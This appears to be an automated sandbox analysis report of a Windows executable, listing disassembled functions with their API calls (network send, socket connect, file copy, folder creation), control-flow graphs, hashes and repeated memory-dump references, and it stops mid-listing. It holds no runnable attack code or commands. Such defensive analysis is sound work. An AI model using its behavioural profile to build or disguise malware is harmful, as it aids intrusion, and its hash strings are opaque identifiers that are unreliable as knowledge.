                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProcSend
                                                                          • String ID: Ws2_32.dll
                                                                          • API String ID: 3987619627-3093949381
                                                                          • Opcode ID: 05d3ee1d949b3c1b29b5e4a829a76301db68b0856d29d482683403bd9d51f4c1
                                                                          • Instruction ID: 969d2c647f9b79f717578c7bf1dcec9b0f0e6b7693716f1a9bae22ba1fddf816
                                                                          • Opcode Fuzzy Hash: 05d3ee1d949b3c1b29b5e4a829a76301db68b0856d29d482683403bd9d51f4c1
                                                                          • Instruction Fuzzy Hash: FC02D070D04298DFDF25CFA4C8907ADBBB0EF5A314F24428DE4856B6C6D7741986CB92
                                                                          Function 00AA8F20 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 273libraryloadernetworkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 13278 aa8f20-aa8f78 13279 aa8f7a 13278->13279 13280 aa8f7e-aa8fe5 call aa8b50 13278->13280 13279->13280 13283 aa9006-aa900f 13280->13283 13284 aa8fe7-aa8fee 13280->13284 13285 aa9030-aa905b call abae80 call b8a3a0 13283->13285 13286 aa9011-aa9018 13283->13286 13284->13283 13287 aa8ff0-aa8ffd 13284->13287 13297 aa906e-aa9075 call ab8dc0 13285->13297 13298 aa905d-aa9064 13285->13298 13286->13285 13288 aa901a-aa9027 13286->13288 13287->13283 13292 aa8fff-aa9001 13287->13292 13288->13285 13295 aa9029-aa902b 13288->13295 13292->13283 13295->13285 13302 aa907a-aa9081 13297->13302 13299 aa9068-aa906c 13298->13299 13300 aa9066 13298->13300 13299->13302 13300->13299 13303 aa9083 13302->13303 13304 aa9085-aa909b 13302->13304 13303->13304 13305 aa909f-aa90bb call b8a3a0 13304->13305 13306 aa909d 13304->13306 13309 aa90bf-aa90dd call b8a3a0 13305->13309 13310 aa90bd 13305->13310 13306->13305 13313 aa90df 13309->13313 13314 aa90e1-aa90e8 13309->13314 13310->13309 13313->13314 13315 aa90ea 13314->13315 13316 aa90ec-aa9121 call b8a3a0 call ad5270 call b8a3a0 13314->13316 13315->13316 13323 aa9202 13316->13323 13324 aa9127 13316->13324 13325 aa9206-aa920f 13323->13325 13326 aa9130-aa913d 13324->13326 13327 aa9230-aa923c 13325->13327 13328 aa9211-aa9218 13325->13328 13329 aa913f 13326->13329 13330 aa9141-aa91f1 call c5ab10 GetProcAddress WSASend 13326->13330 13332 aa923e-aa9245 13327->13332 13333 aa925c-aa9271 13327->13333 13328->13327 13331 aa921a-aa921c 13328->13331 13329->13330 13338 aa9272-aa9276 13330->13338 13339 aa91f3-aa91fc 13330->13339 13337 aa9220-aa9227 13331->13337 13332->13333 13335 aa9247-aa9253 13332->13335 13335->13333 13342 aa9255-aa9257 13335->13342 13337->13327 13340 aa9229-aa922b 13337->13340 13338->13325 13339->13323 13339->13326 13340->13327 13342->13333
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00AA91D3
                                                                          • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00AA91EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProcSend
                                                                          • String ID: Ws2_32.dll
                                                                          • API String ID: 3987619627-3093949381
                                                                          • Opcode ID: 58ca9a42e233e9ea3618ea2d3b91c50887734d1b883af532b3886408e4e309e9
                                                                          • Instruction ID: b86414dc89aaa147c37c06a0405d7d8e655ca6dcf669361db2dd3db142b2792f
                                                                          • Opcode Fuzzy Hash: 58ca9a42e233e9ea3618ea2d3b91c50887734d1b883af532b3886408e4e309e9
                                                                          • Instruction Fuzzy Hash: C4C16670E00614DFDB24DFA8D884B9EBBB0BF09710F18819DE856AB392D735AD05CB91
                                                                          Function 00B76B20 Relevance: 4.6, APIs: 3, Instructions: 103fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00B76B53
                                                                          • CopyFileA.KERNEL32(?,?,00000000), ref: 00B76CA5
                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00B76CB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$CopyFile
                                                                          • String ID:
                                                                          • API String ID: 936320341-0
                                                                          • Opcode ID: 4c7431247ef03745243ab75feaa7506ae8c613d8f0e3e64a11a3b9052287a2b0
                                                                          • Instruction ID: f97ba6d1b3f0dd7d17d6200727b70bd43ce95ee01c4dbd64a29e54861b8eb309
                                                                          • Opcode Fuzzy Hash: 4c7431247ef03745243ab75feaa7506ae8c613d8f0e3e64a11a3b9052287a2b0
                                                                          • Instruction Fuzzy Hash: D631D476E0464CAFDB10DFA4DC41BEDFBB8EB45324F1042AAE418A3381D7765A058BA1
                                                                          Function 00B86B90 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00B03997), ref: 00B86BD5
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B86C04
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B86C15
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cpp_errorThrow_std::_$CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 2715195259-0
                                                                          • Opcode ID: 3ae61bb6e1e486a3a2f17cbb1b12b5e7d691ede4f0afa8ac75994519619903d0
                                                                          • Instruction ID: 1241194b0209a52a6fd14c3b19e7ebe7d58a61769c98262568f5be269ebd9ae3
                                                                          • Opcode Fuzzy Hash: 3ae61bb6e1e486a3a2f17cbb1b12b5e7d691ede4f0afa8ac75994519619903d0
                                                                          • Instruction Fuzzy Hash: C2F0F9B1941614ABC720AF58AD06B5977E8D701730F20036AF436577D0E7B50901C7A6
                                                                          Function 00B7EFB0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B7F01A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID: #>o
                                                                          • API String ID: 1514166925-2384581134
                                                                          • Opcode ID: e2d99eb6e9c2c8badc0d9f7e8e94bebc479d570fda4ebde80fd2dbe6f428f304
                                                                          • Instruction ID: e0c6d797c21ca90019de3fbc2d935010345caefee27419c73f211cd10c311a98
                                                                          • Opcode Fuzzy Hash: e2d99eb6e9c2c8badc0d9f7e8e94bebc479d570fda4ebde80fd2dbe6f428f304
                                                                          • Instruction Fuzzy Hash: EC7144B0C05348DBEB24CFA8C985BEDBBB4EF09314F244299E8096B292D7755A84CF54
                                                                          Function 00B76710 Relevance: 3.3, APIs: 2, Instructions: 279COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B76B20: GetLastError.KERNEL32(?,00000000), ref: 00B76B53
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B76B04
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B76B15
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cpp_errorThrow_std::_$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2454169095-0
                                                                          • Opcode ID: 75bda0a00a5fcbf647960693753ebd2fd80785df143f5888fd7404547c902b2b
                                                                          • Instruction ID: 9aabe2768244560cc1ac8938830880fef9155918d570dd265a86e7cd16d66616
                                                                          • Opcode Fuzzy Hash: 75bda0a00a5fcbf647960693753ebd2fd80785df143f5888fd7404547c902b2b
                                                                          • Instruction Fuzzy Hash: 9FD16AB0C00249DBDB14DFA8D9457EEFBB1EF15304F148299D409BB392EB715A49CBA2
                                                                          Function 00B76240 Relevance: 3.3, APIs: 2, Instructions: 262COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __Xtime_get_ticks.LIBCPMT ref: 00B76551
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7655F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 3390117325-0
                                                                          • Opcode ID: 2dc117c32368ce6c020cd8e89e1b996fdca6256299c1d821502e003b4338f3ab
                                                                          • Instruction ID: 46cb8e31f50eee7e4a65c67dcda374e270ee22c3e157b917387d72d51ce2c237
                                                                          • Opcode Fuzzy Hash: 2dc117c32368ce6c020cd8e89e1b996fdca6256299c1d821502e003b4338f3ab
                                                                          • Instruction Fuzzy Hash: 41A19B71D016099FDB14CFA8C995BAEBBF1EF44310F2582A9E829BB380D7759D44CB90
                                                                          Function 00B76570 Relevance: 3.1, APIs: 2, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B766EA
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B766FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cpp_errorThrow_std::_
                                                                          • String ID:
                                                                          • API String ID: 2134207285-0
                                                                          • Opcode ID: feaab509b568629c1d2727262f9761bbb09679527414c566d977ed813e3d8d3f
                                                                          • Instruction ID: d83dd5671cf280539dcf31c1eca851936158ba17ebfb56c4992c8ad3e405f1ca
                                                                          • Opcode Fuzzy Hash: feaab509b568629c1d2727262f9761bbb09679527414c566d977ed813e3d8d3f
                                                                          • Instruction Fuzzy Hash: B441F4B1D007418BCB24DF68D9417AEB7F0EB94710F18436AE829677D1E771EA05C792
                                                                          Function 00AE8DFF Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,CF830579,?,00AE8CE6,00000000,CF830579,00C1A178,0000000C,00AE8DA2,00ADD07D,?), ref: 00AE8E55
                                                                          • GetLastError.KERNEL32(?,00AE8CE6,00000000,CF830579,00C1A178,0000000C,00AE8DA2,00ADD07D,?), ref: 00AE8E5F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ChangeCloseErrorFindLastNotification
                                                                          • String ID:
                                                                          • API String ID: 1687624791-0
                                                                          • Opcode ID: 548b2c772aff77004ff158967c9b018893f43c5899bdc72e5effde6f44b8625c
                                                                          • Instruction ID: c44f88c54d96b8b3255b5457fa597e083dc2f2d4184bd9441d936a7efae47e9f
                                                                          • Opcode Fuzzy Hash: 548b2c772aff77004ff158967c9b018893f43c5899bdc72e5effde6f44b8625c
                                                                          • Instruction Fuzzy Hash: C51149336051E05AC6256377AD86B7E77C98B82B34F29065DF91C8B1D3DF79CC828291
                                                                          Function 00C6301A Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00D31770,?,?,?,?,?,?,?,00CC96AE), ref: 00BE593A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: S
                                                                          • API String ID: 1452528299-543223747
                                                                          • Opcode ID: af6a39807807fd3d83bf1b1386957c6c422f966fbf285e8f6da3e90e6f204725
                                                                          • Instruction ID: e56dbb08dc1d38f3bddb63aec25026853e2681af7541d75ed91747912c925f90
                                                                          • Opcode Fuzzy Hash: af6a39807807fd3d83bf1b1386957c6c422f966fbf285e8f6da3e90e6f204725
                                                                          • Instruction Fuzzy Hash: F2F0D632504249ABCF208F25E800B9ABBD5FF45334F048399F96CD22A0D735D570DB92
                                                                          Function 06B82399 Relevance: 3.0, APIs: 2, Instructions: 25networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cleanup$closesocketconnectfreeaddrinfosocket
                                                                          • String ID:
                                                                          • API String ID: 2878866204-0
                                                                          • Opcode ID: a7ae820e81eabf8828ee4327af6c11450e52a3c89ab16e42604ad44c1e46ea64
                                                                          • Instruction ID: 17eb80b1ecb43509ebd4471352aa8ee4a9d5459c38bc5dfdc4ea662a005725be
                                                                          • Opcode Fuzzy Hash: a7ae820e81eabf8828ee4327af6c11450e52a3c89ab16e42604ad44c1e46ea64
                                                                          • Instruction Fuzzy Hash: 9DF0FEB8904108EFCB64DF94D5989ADB7B5FB49325F2087C9E919572C0C7309F42DB80
                                                                          Function 00AEB9D0 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,?,00ADD2B1,?), ref: 00AEB9E2
                                                                          • __dosmaperr.LIBCMT ref: 00AEB9E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr
                                                                          • String ID:
                                                                          • API String ID: 1659562826-0
                                                                          • Opcode ID: efed3be4a9565a21ba3fc15e5293dc2a346eec170b42e0130baaf6798c5f2a12
                                                                          • Instruction ID: ff021735566283371d1e946d4f23a030fd40f59e426f9a311c15d20bd2cfb5e1
                                                                          • Opcode Fuzzy Hash: efed3be4a9565a21ba3fc15e5293dc2a346eec170b42e0130baaf6798c5f2a12
                                                                          • Instruction Fuzzy Hash: 05D01232015548369A103BF76C0996B7B5D8ED1378B140711F52CCA291DF35C4919276
                                                                          Function 00AB3D50 Relevance: 1.8, APIs: 1, Instructions: 253COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AB4093
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Concurrency::cancel_current_task
                                                                          • String ID:
                                                                          • API String ID: 118556049-0
                                                                          • Opcode ID: 09850bfcb0d6440f0a85dbb2af8663264355d39327e62b4bbe80713b9860f471
                                                                          • Instruction ID: 3c6fbd07c70425d0fb6f07af77ecf20458d4c9fe153e9b335156058b3c170a5b
                                                                          • Opcode Fuzzy Hash: 09850bfcb0d6440f0a85dbb2af8663264355d39327e62b4bbe80713b9860f471
                                                                          • Instruction Fuzzy Hash: 8CC146B1901249DFDB00CFA8C580799FBF4AF09304F28C19AE458AB392D376AA45CB91
                                                                          Function 00AB5350 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AB546E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Concurrency::cancel_current_task
                                                                          • String ID:
                                                                          • API String ID: 118556049-0
                                                                          • Opcode ID: c43c73fe78e38b0688488126db9ffe1859d226e32f0bb457010f7da854722a42
                                                                          • Instruction ID: 7ff53b8541e50307620a1d11540d8d597e395c580611cb8a81a2565758986f10
                                                                          • Opcode Fuzzy Hash: c43c73fe78e38b0688488126db9ffe1859d226e32f0bb457010f7da854722a42
                                                                          • Instruction Fuzzy Hash: EC616AB1E01615DFCB10CF69CA84B9ABBF9FF48710F24816AE4199B392C775DA01CB90
                                                                          Function 00AD8E02 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
